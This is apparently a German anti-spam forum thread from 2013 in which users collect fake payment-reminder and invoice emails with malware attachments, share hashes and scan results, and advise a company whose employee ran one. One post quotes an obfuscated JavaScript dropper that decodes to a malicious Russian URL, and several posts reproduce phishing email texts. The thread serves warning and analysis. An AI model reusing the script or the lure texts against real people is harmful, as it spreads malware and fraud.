Content-Type: multipart/mixed; boundary="=-XC1094844F"
Message-ID: [ID filtered]
X-Provags-ID: [ID filtered]
0M2z6j2oQus+pextLpoIeXYupcXTfKw70bBcG6h/P3VGEHp8H3
LIwyu1xy3HnHIIPzPgpxZ4P4+xiV3wUKygJ+KNFxGzVjMrQt8n
ztjYEu+ICKRj52sstPwpLKzASvGrtEKEdNAAyyhA13WvYYiyGy
haKX9IHL9muIpfvqVRgYQ==
Envelope-To: <************@gmx.de>
X-GMX-Antispam: 0 (Mail was not recognized as spam); Detail=V3;
X-GMX-Antivirus: 0 (no virus found)
X-UI-Filterresults: notjunk:1;V01:K0:UimAAxO0KwQ=:skYOMea4tNRFMuEgweRf9K...






Sehr geehrte/r **** ********,

leider haben Sie auf unsere schriftliche Zahlungserinnerung vom 19.01.2013 nicht reagiert, so dass der fällige Betrag aus der Rechnung 30241001 vom 22.12.2012 von Ihnen noch nicht überwiesen wurde.

Deine Bestell-Nummer: 82449048928 bei www.sanicare.de 592,90 Euro Lieferung bestätigt von: **** ********

Wir verpflichten Sie daher den fälligen Betrag binnen 6 Tagen ohne Abzug auf das in der Anlage genannte Konto zu überweisen.

Im beigefügtem Dokument sehen Sie Ihre Rechnung und andere Einzelheiten Ihrer Bestellung.

Bei Rückfragen können Sie sich an unseren Kundenservice unter 0900 - 17 518 62623 (1,29 Euro/Min dt. Festnetz) wenden.
Sollte auch diese Zeitfrist ohne eine Zahlung verstreichen, so werden wir die Zahlung an unsere Anwälte zur professionellen Einforderung übergeben.
Wir möchten Sie darauf hinweisen, dass wir alle Zahlungseingänge bis zum 23.01.2013 berücksichtigt haben.

Bitte lassen Sie uns wissen, ob wir Ihnen noch weiter behilflich sein können.

Mit freundlichen Grüßen

Ihre Kundenbetreuung
Germany Hamburg
Teresa Ropke

Hier auch aufgeschlagen; ich gehe davon aus, dass der Anhang verseucht ist und es schon ein Fehler war, diesen überhaupt zu öffnen.

Hier auch aufgeschlagen; ich gehe davon aus, dass der Anhang verseucht ist und es schon ein Fehler war, diesen überhaupt zu öffnen.

Naja, das ZIP zu öffnen dürfte harmlos sein, solange du die .COM Datei nicht ausführst.

Habe das Sample (Anhang) mal an diverse Antivirenhersteller gesendet, Virustotal erkennt leider noch seht wenig:
https://www.virustotal.com/file/966eff35422dc9516e46a86096909c15d3fd434eb930d8d22f7b117fdd4876f1/analysis/1358963583/


War bei euch derselbe Anhang dabei?

@Mods:
Sollte man den Viren-Unter-Thread nicht besser abtrennen und nach 1.4 verschieben?

Zur Diskussion: (Die Fa. brands... kannte ich bisher noch nicht):

"Von: a_hoffmann8x8Xweb.de
Sehr geehrter Kunde xxxxx,
zum Unglück war der Einzug mittels Lastschrift von Ihren angegebenen Konto nicht machbar oder es wurde eine Rücklastschrift veranlaßt, für die Unkosten von xx,xx EUR berechnet sind.
Die Bestellnummer: xxxxxxxxxxx bei www.brands4friends.de 9xx,xx Euro
Lieferung an: xxxxx
Wir geben Ihnen Gelegenheit die Summe inklusive der Gebühren für die Rückbuchung bis zum 14.02.2013 an uns zu überweisen. Sonst sehen wir uns gezwungen, ein Betreibungsverfahren in die Wege zu leiten.
Artikeleinzelheiten und Widerruf Erklärung finden Sie in beigefügtem Anhang.
Bitte beachten Sie, dass kein postalischer Versand der Unterlagen erfolgt!
Mit besten Grüßen
Ihre Kundenbetreuung Online
Ralf Zimmerman"
Anhang: ZIP-Datei „Infos-Mahnungxx.02.2013.xxx“

Return-Path: meine.babs [at] web.de
Received: from mout-xforward.web.de ([82.165.159.34]) by mx-ha.gmx.net
(mxgmx004) with ESMTP (Nemesis) ID: [ID filtered]
<xxxxx [at] gmx.de>; Thu, 07 Feb 2013 xx:xx:xx +0100
Received: from 000-PC ([178.8.211.213]) by smtp.web.de (mrweb103) with ESMTPSA
(Nemesis) ID: [ID filtered]
Feb 2013 xx:xx:xx +0100
From: <meine.babs [at] web.de>
To: "xxxx" <poor [at] spamvictim.tld>
Subject:xxxx Zweite Abmahnung Ihrer Bestellung Kundennummer: 428557379001
Date: Thu, 7 Feb 2013 xx:xx:xx GMT
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XCA2FD1D75"
Message-ID: [ID filtered]
X-Provags-ID: [ID filtered]
hqzdiC4/mtS+6p1hiHUj3wCLF19ALAfc0nVNzLVsJdvd5wXucn
AXnKZ+q2UtC8f0OVJLj019Tm9s+Fu+SbOy6lHmpaVuWC105Pq6
y+1Y6C9TNuIwamW8hrqk9DY7HwCT0GMrxkbT2XUpeWdi3eF95Y
0vQdU3F4flAYioOGqtoSg==
Envelope-To: <poor [at] spamvictim.tld>
X-GMX-Antispam: 6 (nemesis text pattern profiler); Detail=V3;
X-GMX-Antivirus: 0 (no virus found)
X-UI-Filterresults: junk:10;V01:K0:nI7Ld2nyLfI=:7OKqVaAy7IE/cfSqefswRXKX
fn2sdWbad7Y89bQf9mm+VZDFlztGhrGUCFgHzt/AEyICeQ3Id8yYQEcoA086nnfy1I/TH95
vWpRGClXpoxd1r58F+St47FBXlBOuBu2YbGX2+Va+7zhyIoWNzl3BYmC7khnWqPoi/rv7Vj
uomj1d+qXouZ+4zpWS++yMgKLbddgaCZ9/hY856k8hHH+afIMR5EW4AyVVFFSzoUGokKGxG
jjDcZJs7Vt71cmKRFYvLQXXfR96xtyt1fcWgW4PphGd1cmoJON7Hh2jGxYE4bugGzErcvRK
80220LZ7Ji9uJh5/ufY9RTRn/4BhIoPz1ScIbEQFU51W+Q35cdz/gzftNdJAOFkdJIz8BDP
rshuTCzAcfKLu3o7ohu7LizV33oVio4VOpkbyTPG7JNthvMCIF+xGco+HkjzO5gP4yy4ZDV
lLIWzvp4MqY8QVt6nIID4tQMPzjaDNSktcbL+/53PP29eoxFHnflL2Q9+vEbkp7vhTqEOJk
aWmmjYhWGNlnzDZNoXqzTSZllZV59bO/SKYodJJsQyOXOeEqP1OTiiOF7MGGhE5F/lRdKt1
MnUQSpiXM/f3pBn7Ll4sik6SD0ETS0wfDvdLOQHO2OWPqgqaTMHdERjFu5nPR1f2XjEzvUh
MmF6fJ5ekH4xd9vJMmCJ+DK1v02PTFkOtwURDl/YGSDoqmb+U+YtZb08I3aQQeqfWfwt5tE
kDsn7u96vp+Jw6tVkglnCaBvTAeEMN1m3LUjIFvLwlyD9u7VhOuv5Y5QyCgFxPppwAL+yYJ
JEvlTs4TfK5tQuoM/UpKj5leoyK2UNxLlNXb2es2GoNeYPjTFdqYJn4F8slAfsqTQ7JHsJH
no+QO8xV6779l5MSfaheAuoByxhBC0R21vbyEPRg4dKVXrqBZnGOXYat8LX+Z2d5QrTdMQq
U/wo/bXxCTYKB6h9HsaoXQKW4apAKLioUzobcZ9h7MtKt3+0JyJyC9n5AjzAIAoJRXPNOQ4
tKRbNpMcGxhAldt33u4C3CEPVs2Kw5R82xlBZg8dmhnjNT6yvJCzY94XV/czmi2w4BY8F+z
JCxBYZa7EjaV7LWvvsD+SD+hmCf+Ez1LQieSKHozPWG/NQt+596RHkixpXHkQbZ3qfhR7XC
Oz/UK11hWvsnGBDogZ7IahUGJZfO1aMW1QiF6NDnacRFwyymKzda9QsBreyPzQFAI+7Svo5
ik3+MS0fES5ige7jqFoWdi+65smpuchzwlVtf7/99yYTdgAUx0VwA2ySaV3wxFAbf30p1Di
VzNUpzFXvpyZ7wV74mM4g1AQoK79s8ZgXj5Jl8VAiyQUZdRD8vSF9ibOOIq73JfjwaxwNEf
nR3myikyEucnqKqJwq42gRwIbEa3pqCz2pI
X-GMX-UID: [UID filtered]
X-Flags: 1401


Interessant auch die Zeitangabe in Zeile 11...


Sehr geehrte/r X Y,

bedauerlicherweise war die Forderung mittels Lastschrift von Ihren angegebenen Bankkonto nicht erfolgreich oder es wurde eine Rückbuchung veranlaßt, für die Unkosten von 41,47 EUR entstanden sind.

Ihre Bestellnummer: 4955100092256 bei Computeruniverse AG
Rechnungs-Summe: 527,90 Euro X Y
Wir bitten Sie den nicht beglichenen Betrag binnen 3 Tagen ohne Abzug auf das in der Anlage genannte Konto zu überweisen. Sollte auch diese Zeitfrist ohne einen Zahlungseingang verstreichen, so werden wir die Zahlung an unsere Anwälte zur professionellen Einforderung geben.

Bitte nehmen Sie sich einen kleinen Moment Zeit, um Ihre Auftragsdetails zu überprüfen.
In der Anlage sehen Sie Ihre Mahnung und andere weitere Details Ihrer Bestellung.


Information über Ihr 14-tägiges Rückgaberecht:
Sie können Ihre Bestellung innerhalb von 14 Tagen nach Erhalt der Lieferung ohne Begründung an die in der Rechnung genannte Adresse zurücksenden. Zur Fristwahrung genügt die rechtzeitige Absendung.

Mit verbindlichen Grüßen

Lina Vogt Leiter der Kundenbetreuung

Ich habe noch nie von einer Computeruniverse AG gehört. Die ganze Rechnung ist natürlich fiktiv um den Anwender unsicher und unkonzentriert zu machen.

Aber gutes fehlerfreies Deutsch, oder habe ich was übersehen?


Der Anhang ist eine ZIP, Datei
md5sum: 1ee929392bb7328775e59f0bbb224ed9 Mahnung Lieferung 06.02.2013 Versand .zip

in der wiederum befindet sich eine .com Datei,wahrscheinlich ein Trojaner.
md5sum: 5c2e6ae70f2431b738a9507a23ee7655 Mahnung Lieferung 06.02.2013 Versand .com

Dazu Google;

Es wurden keine mit Ihrer Suchanfrage - 5c2e6ae70f2431b738a9507a23ee7655 - übereinstimmenden Dokumente gefunden.

Habe die .com per virusscan.jotti.org/de scannen lassen:

Diese Datei wurde bereits geprüft. Die Ergebnisse des letzten Scans sind unten zu sehen.
[..]
Clam-AV PUA.Win32.Packer.Purebasic-1
Fortinet W32/Zbot.ANM!tr

Alle anderen Suchengines von jotti finden nix...

http://www.fortiguard.com/av/VID2619370 sagt:

W32/Zbot.ANM!tr is classified as a Trojan.

Trojan has the capabilities to remote access connection handling, perform Denial of Service (DoS) or Distributed DoS (DDoS), capture keyboard inputs, delete file or object, or terminate process.

The Fortinet Anti-Virus Analyst Team is currently in the process of creating a detailed description for this virus.

Aber gutes fehlerfreies Deutsch, oder habe ich was übersehen?



Zum Beipiel:


war die Forderung mittels Lastschrift von Ihren angegebenen Bankkonto nicht erfolgreich

Wir bitten Sie den nicht beglichenen Betrag binnen 3 Tagen

und andere weitere Details

Mit verbindlichen Grüßen

Bekam heute eine eMail-Mahnung, mit zip-Datei.
Hätte noch 784 Euronen bei Mytoys offen.
Und wenn ich nicht sofort überweise, gehts an die Anwälte.
Da ich eine Meldung über 5 Fehlversuche auf diesem eMail-Account habe,
habe ich gleich mal mit Mytoys telefoniert. Kommt natürlich nicht von denen
und ist ihnen schon bekannt.
Ein Bekannter hatte das gleiche vor ein paar Tagen. Scheint jetzt wieder mal
ein neuer Abzock-Versuch zu sein.

... Scheint jetzt wieder mal
ein neuer Abzock-Versuch zu sein.
Abzocke = nein
Das ist ein Versuch, einen Trojaner (im Anhang der Mail) zu unterschieben.

Zum Beipiel:

Du hast recht, und möglicherweise lesen die sogar hier mit :lil: und verbessern die nächste Version. xD :p

@Baldrian
Hat Deine .com Datei die gleiche md5sum? Wie sind die Dateinamen?
Ich denke die Namen kreieren die Black-Hacker mit einen Script so das stets aktuell aussehende Dateien entstehen.

Aber Vorsicht mit dem entpacken, Du darfst sie auf keinen Falle unter Windows XYZ ausführen!

Danke für die Warnung.
Ich entpacke solche Dateien grundsätzlich nicht.
Ausser es schickt mir ein Bekannter eine Datei, über die
wir zuvor gesprochen bzw. geschrieben haben.

Die Datei heisst: "Mein Name" Einzelheiten Ihrer Bestellung.zip

Ich bekomme blöderweise den Header nicht angezeigt.
Liegt vielleicht daran, dass ich die Mail in den Papierkorb geschoben habe.

Hi
vom Verschlüsselungstrojaner, um den es hier geht, gibts pro Tag um die 1-3 Variannten.
Aber die Infektionsraten scheinen gott sei dank nicht mehr so hoch zu sein wie im letzten Jahr, da hatte ich im Trojaner-board extrem viele Fälle zu bearbeiten.

^
Kannst Du uns mal eine Thread URL (oder mehrere) hier mit rein kopieren damit dokumentiert ist wie es dann aussehen würde wenn jemand die .com gestartet hätte?

Danke.

Sorry, der Beitrag "Abmahnung_brands4friends(???)" gehört hierher:
https://www.antispam-ev.de/forum/showthread.php?33431-Virus-Neue-Bestellung-Lieferschein-f%FCr-xxx-Mahnung
Bitte verschieben MOD: [x] Erledigt
Grüße Juli

Hi schneite heute eine Mail für ein angebliches Flugticket für/von British Airways herein. Angeblich sei das Ticket angehängt. Diesmal - wie zu erwarten war - kein *.zip, sondern eine normale *.html-Datei, die man mit dem Browser öffnen sollte. Ich habe die mal mit dem Texteditor geöffnet. Der Textteil ist ziemlich langweilig:


Please wait... You will be forwarded...
Internet Explorer / Mozilla Firefox compatible only

Interessanter ist das beigefügte script:


<script>dbshre=245;try{window.document.body/=2}catch(gdsgsdg){if(dbshre){zaq=0;try{v=document.createElement("div");}catch(agdsg){zaq=1;}if(!zaq){e=eval;}ss=String;asgq=new Array(109,89,107,43,56,43,49,52,4,113,88,106,43,55,113,88,106,42,53,5,96,94,33,1 12,92,105,41,54,55,113,88,106,43,35,27,114,92,104,93,112,100,93,103,110,41,99,10 3,92,91,111,96,103,103,55,29,95,108,109,106,53,38,39,94,106,100,88,102,104,101,1 00,93,38,107,111,53,47,40,49,42,42,93,103,107,111,104,38,100,98,104,102,106,39,9 2,105,103,108,101,103,40,107,95,104,27,53,120);s="";for(i=0;i-105!=0;i++){if(window.document)s+=ss["fro"+"mCha"+"rCo"+"de"](1*asgq[i]-(i%5-5-3-1));}
z=s;e(s);}}</script>

Hübscher (und lesbarer):


<script>
dbshre = 245;
try {
window.document.body /= 2
}
catch (gdsgsdg) {
if (dbshre) {
zaq = 0;
try {
v = document.createElement("div");
}
catch (agdsg) {
zaq = 1;
}
if (!zaq) {
e = eval;
}
ss = String;
asgq = new Array(109, 89, 107, 43, 56, 43, 49, 52, 4, 113, 88, 106, 43, 55, 113, 88, 106, 42, 53, 5, 96, 94, 33, 112, 92, 105, 41, 54, 55, 113, 88, 106, 43, 35, 27, 114, 92, 104, 93, 112, 100, 93, 103, 110, 41, 99, 103, 92, 91, 111, 96, 103, 103, 55, 29, 95, 108, 109, 106, 53, 38, 39, 94, 106, 100, 88, 102, 104, 101, 100, 93, 38, 107, 111, 53, 47, 40, 49, 42, 42, 93, 103, 107, 111, 104, 38, 100, 98, 104, 102, 106, 39, 92, 105, 103, 108, 101, 103, 40, 107, 95, 104, 27, 53, 120);
s = "";
for (i = 0; i - 105 != 0; i++) {
if (window.document) s += ss["fro" + "mCha" + "rCo" + "de"](1 * asgq[i] - (i % 5 - 5 - 3 - 1));
}
z = s;
e(s);
}
}
</script>

Ich habe keine Ahnung, was das Script macht - kann das jemand übersetzen?

So wie ich das sehe wird eine bestimmte Seite aufgerufen. Die URL steht aber sehr versteckt drin, nämlich als Zahlenwerte der einzelnen Buchstaben.

P.S.: Die URL lautet: http://epianokif.ru:8080/forum/links/column.php. Vorsicht, die Seite könnte Schadcode enthalten!

Hallo zusammen,
leider bin ich hier ein absoluter "Userlaie", hatte heute eine Mail mit angeblicher Mahnung im Anhang, den ich nicht öffnete mit folgenden Angaben (ich kann leider diese Zeilen nicht so versiert aufschlüsseln, wie das hier im Forum üblich ist, vielleicht ist es auch schon an anderer Stelle erwähnt, dann bitte wieder löschen:

Return-Path: ***@gmx.net <xxxxx [at] web.de>; Fri, 15 Feb 2013 xx:xx:xx +0100
Received: from mailout-de.gmx.net ([10.1.76.29]) by mrigmx.server.lan (mrigmx002) with ESMTP (Nemesis) ID: [ID filtered]
Received: (qmail invoked by alias); 15 Feb 2013 xx:xx:xx -0000
Received: from p57ABEB1A.dip.t-dialin.net (EHLO DIR_GLAAB) [87.171.235.26] by mail.gmx.net (mp029) with SMTP; 15 Feb 2013 xx:xx:xx +0100
X-Authenticated: #26635662
X-Provags-ID: [ID filtered]
From: <***@gmx.net>
To: <" Vorname, Name, meine Mailadresse>
Subject: =?utf-8?q?15.02.2013 Vorname, Name Mahngeb=C3=BChr Ihrer Bestellung Nummer 6335180?=
Date: Wed, 13 Feb 2013 xx:xx:xx GMT
MIME-Version: 1.0

Sehr geehrter Kunde ...Vorname, Name,

zum Unglück war die Forderung mittels Lastschrift von Ihren mitgeteilten Kontodaten nicht möglich oder es wurde eine Rücküberweisung zum Auftrag gegeben, für die Gebühren von 32,64 EUR entstanden sind.

Deine Rechnungsnummer: 86237903776 bei apomio
Rechnungs-Summe: 440,00 Euro
Lieferung bestätigt von: Vorname, Name

Wir geben Ihnen Gelegenheit den Betrag inklusive der Gebühren für die Rückbuchung bis zum 19.02.2013 an uns zu überweisen. Im anderen Fall sehen wir uns gezwungen, ein Gerichtsverfahren in die Wege zu leiten.

Bitte nehmen Sie sich einen kleinen Moment Zeit, um Ihre Auftragsdetails zu überprüfen.
In der angehängten Datei sehen Sie Ihre Mahnung und andere Einzelheiten Ihrer Bestellung.


Besten Dank und freundliche Grüsse,
J. M. Leiter Online-Services
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XC95DAF886"
X-Y-GMX-Trusted: 0

"apomio" kenne ich nicht, habe auch keine Kontodaten im Internet.
An alle hier viele Grüße, das Forum ist höchst interessant!

obwohl diese British Airways mails nichts mit den fake Rechnungen gemein haben, verteilen beide unterschiedliche Schadsoftware.

Sehr geehrter Kunde ...Vorname, Name,

zum Unglück war die Forderung mittels Lastschrift von Ihren mitgeteilten Kontodaten nicht möglich oder es wurde eine Rücküberweisung zum Auftrag gegeben, für die Gebühren von 32,64 EUR entstanden sind.

Deine Rechnungsnummer:

Bitte nehmen Sie sich einen kleinen Moment Zeit, um Ihre Auftragsdetails zu überprüfen.
In der angehängten Datei sehen Sie Ihre Mahnung und andere Einzelheiten Ihrer Bestellung.


"apomio" kenne ich nicht, habe auch keine Kontodaten im Internet.
An alle hier viele Grüße, das Forum ist höchst interessant!

Bei solchen Mail s müssen sofort die Warnlampen angehen.

1. Die schreiben : Deine Rechnungsnummer
2. Dann: Bitte nehmen Sie sich
3. Dann eine Angehängte Datei.

Danke Smart, "Lampen" gingen auf :D

Sascha vom Nachbarforum hat da einen > Artikel < (http://www.computerbetrug.de/2013/02/offene-rechnung-neue-welle-von-trojaner-mails-uberrollt-deutschland-7352/) dazu geschrieben

Gerade frisch eingetroffen:

Return-Path: <besiegerswmdj576 [at] telekom.de>
Received: from simpso13.lnk.telstra.net (simpso13.lnk.telstra.net [120.151.5.222])
by mx.kundenserver.de (node=mxeu5) with ESMTP (Nemesis)
ID: [ID filtered]
Received: from [212.82.199.114] (account diezt6 [at] telekom.de HELO nyigrd.nxoeappjwr.org)
by simpso13.lnk.telstra.net (CommuniGate Pro SMTP 5.2.3)
with ESMTPA ID: [ID filtered]
From: <rechnungonline. [at] telekom.de>
Subject: RechnungOnline Monat
Abgekippt wurde die Mail von der russischen IP 212.82.199.144 via des australischen Providers Telstra (120.151.5.222), also vermutlich via Zombie.

Der Text gaukelt via HTML täuschend echt eine ganz normale Telekom-Rechnung vor:


Ihre Rechnung für Januar 2013

Guten Tag,

mit dieser E-Mail erhalten Sie Ihre aktuelle Rechnung. Die Gesamtsumme im Monat Januar 2013 beträgt: 46,55 Euro.

Den aktuellen Einzelverbindungsnachweis – sofern von Ihnen beauftragt – und das Rechnungsarchiv finden Sie im Kundencenter. [Hinweis: Hier liegt tatsächlich der Link zum Telekom-Kundencenter.]

Diese E-Mail wurde automatisch erzeugt. Bitte antworten Sie nicht dieser Absenderadresse. Bei Fragen zu RechnungOnline nutzen Sie unser Kontaktformular.

Mit freundlichen Grüßen

R*** H***
Leiter Kundenservice
Schade nur, dass ich überhaupt kein Telekom-Kunde bin. Ansonsten würde ich vielleicht den Anhang 2013_01rechnung_714928806.zip (37,3 kB) tatsächlich mit meiner echten Rechnung verwechseln und mir so einen fetten Virrus einfangen (https://www.virustotal.com/de/file/287170cd167e584a8fd64351908d4b2230234d5fb589df4bfb4df612b47e069f/analysis/). Die Mail kopiert das tatsächliche Aussehen einer Rechnungsmitteilung sehr gut, inklusive der momentan aktuellen Werbekampagnen für Zusatzpakete und ähnliches.

Eine vorsorgliche Warnung an alle Telekom-Kunden: Bitte alle Mails, die irgendwas mit Rechnungen zu tun haben, eventuelle Dateianhänge immer erst mit einem aktualisierten Virenscanner prüfen. Ggf. auch in der Online-Variante, zum Beispiel bei Virus Total (http://www.virustotal.com).

Schönen Gruß
Mittwoch

Und wieder eine neue Variante (Abmahnung für eine Rechnung, da hat Phiski wohl keine Ahnung):

Received: from mailout-de.gmx.net ([10.1.76.30]) by mrigmx.server.lan
(mrigmx002) with ESMTP (Nemesis) ID: [ID filtered]
Received: (qmail invoked by alias); 22 Feb 2013 xx:xx:xx -0000
Received: from p5DDA2E9F.dip.t-dialin.net (EHLO PC2006) [93.218.46.159]
by mail.gmx.net (mp030) with SMTP; 22 Feb 2013 xx:xx:xx +0100


Sehr geehrter Kunde [mein Name],

eben hat unsere Finanz-Leitung bei Ihnen eine offene Rechnung
festgestellt. Bestimmt ist es Ihrer Beachtung entgangen, die Rechnung
für Ihre Bestellung zu zahlen.

Datum Ihrer Bestellung: 16 Januar 2013 [mein Name]
Offener Rechnungsbetrag: 351,21 Euro
Produktnummer: 2674608583
Kosten dieser Mahnung: 6,00 Euro

Wir bitte Sie diesen Betrag unter Angaben genannten Bestellnummer auf
das im Kaufvertrag angegebene Konto umgehen zu überweisen.

Weitere Details entnehmen Sie bitte dem rechtskräftigen Kaufvertrag.
Bei weiteren Rückfragen stehen wir Ihrer gerne zur Verfügung.

Mit freundlichen Grüßen shirtzshop Melina Schulz

Im Anhang dann: Vertrag [mein Name].zip

Wird noch nicht überall erkannt:

https://www.virustotal.com/de/file/c5b15b9ce8e1d849ee6a89543f77e1143ce300b4818cbbdbd47b1f90d15e003f/analysis/1361531610/

http://virusscan.jotti.org/de/scanresult/f62170516753d540030064f4b94b4fc2f7797136

Gibt da 2 verschiedene, einmal mit pdf im Anhang und einmal mit Zip, dort ist ein .pdf.exe drinn.
das PDF nutzt:
CVE-2010-0188
jeder mit einem aktuellen Reader ist da also geschützt.
und läd malware von mehreren, in deutschland befindlichen websites nach, diese wurden gehackt und sind im normal falle ganz normale seiten.
http://www.trojaner-board.de/131367-telekom-spam-rechnungonline-monat-februar-2013-buchungskonto.html
http://www.trojaner-board.de/131338-telekom-spam-rechnungonline-monat.html

2 Artikel dazu

Hallo zusammen.
Ich bekomme auf meiner GMX Adresse auch täglich diese Mahnungen und Angebote, jeweils mit einem Anhang und einer eingefügten .com Datei.
Diese ist jeweils neu, so dass ein aktueller Scanner nicht anschlägt. Diese schicke ich dann zur Signaturerkennung ein.

Alle Mails sind in etwa gleich aufgebaut, besonders aufmerksam macht mich die Tatsache, dass ich mit meinem realen Vor und Nachnamen angesprochen werde.
Dieser ist an sich nur meinem Anbieter und mir bekannt und wird nicht beim Versenden von Mails übersendet.
Hat jemand von euch eine Idee?

Ja, Sicherheitsleck bei GMX. Auch ich werde mit echten Namen angesprochen, habe mich aber bei GMX damals bei den Registrationsdaten vertippt. Beispiel: Müllxer statt Müller.

Die Probleme bei GMX werden auch hier diskutiert. AFAIK hat sich GMX offiziell noch nicht zu aktuell abhanden gekommenen Daten geäußert.

Schönen Gruß
Mittwoch

Obwohl auch über andere Anbieter dieser Vor/Nachname spam ankommt.

Im Anhang ist eine 22 KB große Zip Datei --> AWB-AVIS xxx-xxxxxxxx.pdf.zip

die ich natürlich nicht geöffnet habe.

Die xxx sind von mir dort steht eine Nr.

Habe die Adressdaten etwas entfremdet stimmen auch nicht mit den Daten auf der Webseite überein. Telefonisch ist auf der Nr. von Der Webseite niemand zu erreichen (Besetzt).



Return-Path: <cowlingsu6 [at] first-class-zollservice.de>
X-Original-To: Meinereiner
Delivered-To: Meineriner
Received: from [41.78.233.27] (unknown [41.78.233.27])
by Meinereiner (Postfix) with ESMTP ID: [ID filtered]
for <Meinereiner>; Mon, 4 Mar 2013 xx:xx:xx +0100 (CET)
Received: from [183.39.23.160] (account cowlingsu6 [at] first-class-zollservice.de HELO ktycmxvoamnwqha.sserpas.info)
by (CommuniGate Pro SMTP 5.2.3)
with ESMTPA ID: [ID filtered]
From: "Information" <info [at] first-class-zollservice.de>
To: <Meinereiner>
Subject: Luftfrachsendung AWB
Date: Mon, 4 Mar 2013 xx:xx:xx +0200
MIME-Version: 1.0
X-Priority: 3
X-Mailer: uorv.83
Message-ID: [ID filtered]
Content-Type: multipart/mixed;
boundary="----=a__rnsmkqlub_42_01_79"



Hallo,

anbei der AWB bitte bestätigen ob alles Ok ist.

Danke



Mit freundlichen Grüßen

First Class Zollservice &
Transportvermittlungs GmbH

Niederlassungsleiter

XXXX Str. XX B
64546 Mörfelden Walldorf

Tel.: XXXX
Fax: XXXX

www.first-class-zollservice.de





Schulungen im Bereich Luftsicherheit - ONLINE 3+1 Std. Schulung gemäß 185/2010 Kap. 11.2.3.9 /
Schulungen im Bereich Zoll- und Außenwirtschaft

Wir arbeiten ausschließlich auf Grundlage der Allgemeinen Deutschen Spediteurbedingungen (ADSp), jeweils neueste Fassung.
Diese beschränken in Ziffer 23 ADSp die gesetzliche Haftung für Güterschäden nach § 431 HGB für Schäden im speditionellen
Gewahrsam auf EUR 5,- je Kg. Bei multimodalen Transporten unter Einschluss einer Seebeförderung auf 2 Sonderziehungsrechte
je Kg sowie darüber hinaus je Schadenfall bzw. - ereignis auf EUR 1,0 bzw. 2,0 Mio. oder 2 Sonderziehungsrechte /kg, je nach dem,
welcher Betrag höher ist.

Passt wunder bar in das Schema hier: https://www.antispam-ev.de/forum/showthread.php?33431-Virus-Neue-Bestellung-Lieferschein-f%FCr-xxx-Mahnung [x] getackert
Was sagt denn http://virusscan.jotti.org/de/ oder https://www.virustotal.com/de/ zu der exe-Datei?

Der Anhang endet mit pdf.zip und ist kein Archiv ich denke mal um den Mailfilter für PDF Dateien auszuhebeln. ich kann dir die Mail gerne weiterleiten aber ich selbst spiele nicht mit verdächtigen Dateien rum ;)

Dateinamen (max. 25)
1. AWB-Avis 066-03690048.pdf.zip
2. AWB-Avis 645-76483114.pdf.zip
3. file-5217587_zip
4. AWB-Avis 679-53989602.pdf.zip


Scheint im Umlauf zu sein das kommt bei Virustotal raus allerdings nicht als Verdacht 0/46 eben keine .exe

me too - je 2x

Received: from bba552634.alshamil.net.ae (bba552634.alshamil.net.ae [86.98.143.184])

Received: from static.vdc.vn (unknown [113.161.82.247])

die gebräuchlichen Scanner sind noch ziemlich blind...
Virustotal (https://www.virustotal.com/de/file/0f640c40305ff756aaa119a7a856fef4e2c3bc37994d8361bdf5c644df7e9781/analysis/1362393700/)

schau mir das grad näher an, scheint aber backdoor.andromeda zu sein, hatt also mit den fake rechnungsmails eigendlich nichts zu tun.

Hallo Guten Tag,

habe mich aus gegeben Anlass hier schnell angemeldet.

leider hat eine Dame intern die zufälligerweise auch die Zollabwicklung und gerade an einer Sache in China beteiligt ist diese Mail geöffnet.
Sse hat leider Die exe geöffnet, da Sie von einem PDF ausging.

Dannach war eine Meldung das Sie alle anderen Anwendungen schließen soll danach bekam ich den Anruf!

Ist somit der Virus installiert ?

kann mir hier ein erklären was dieser Wurm/Virus/trojaner macht?

Wir kann ich Ihn erkennen?

Welches Risiko besteht?
Virenscanner können nichts erkennen.
Danke Vorab.

Firma Neumann

Ist somit der Virus installiert ?
Ja, fast 100% sicher hat sich damit irgendein Schädling eingenistet.


kann mir hier ein erklären was dieser Wurm/Virus/trojaner macht?
Ohne dass der Schädling eindeutig per Virenscanner erkannt wurde, ist es schwer zu sagen, was er macht. Ich kann im Prinzip nur allgemeine Dinge über Viren, Würmer und Trojaner sagen, die man aber genauso gut und ausführlicher bei Wikipedia nachlesen kann. Wäre der Name bekannt, kann man auf den Webseiten der Hersteller von Schutzprogrammen nachlesen, was er tut, aber das nützt auch nicht viel, wenn man ihn nicht bekämpft.


Wir kann ich Ihn erkennen?
Als Laie kannst Du zwar prinzipell auch die Dinge im Auge behalten, anhand derer Profis Rechner auf Virenbefall prüfen und die auch Virenscanner im Auge behalten, allerdings muss man, um das zu verstehen, schon eine Menge darüber wissen, was auf einem Computer unter der Haube läuft. Um bei dem Bild zu bleiben: Wenn Dein Motor einen Schaden hat, kann den möglicherweise nur ein Automechaniker diagnostizieren.



Welches Risiko besteht?
Virenscanner können nichts erkennen.
Datenverlust, der Missbrauch des Rechners für illegale Tätigkeiten mit den möglicherweise daraus erwachsenden Folgen für den Inhaber als rechtlich Verantwortlichem, Spionage, etc.pp.
Wie gesagt: Ohne den namen des Schädlings kann man nicht genau sagen, was passieren kann. Dass der Virenscanner nichts erkennt, spricht dafür, dass der Schädling neueren Datums ist und im Netz noch nicht lange sein Unwesen treibt. Es müssen erst genügend Rechner befallen werden, bevor Virenabwehrspezialisten die Gefahr erkennen und geeignete Gegenmaßnahmen entwickeln können.

Ich würde Deiner Bekannten dringend dazu raten, den Computer vom Internet zu trennen (Kabel raus!), eine Datensicherung durchzuführen und dann von einem Fachmann das Betriebssystem neu aufspielen zu lassen. Alles andere wäre angesichts der Tatsache, dass sie eine exe-Datei ausführte, reine Fahrlässigkeit.

Schönen Gruß
Mittwoch

Dannach war eine Meldung das Sie alle anderen Anwendungen schließen soll danach bekam ich den Anruf!

Was für einen Anruf? Von der Mitarbeiterin?


Ist somit der Virus installiert ?

kann mir hier ein erklären was dieser Wurm/Virus/trojaner macht?

Wir kann ich Ihn erkennen?

Welches Risiko besteht?
Virenscanner können nichts erkennen.

Da der Virus offenbar bei den gängigen Antiviren-Herstellern noch nicht bekannt ist, kann im Moment vermutlich niemand sagen, was das Ding genau macht.

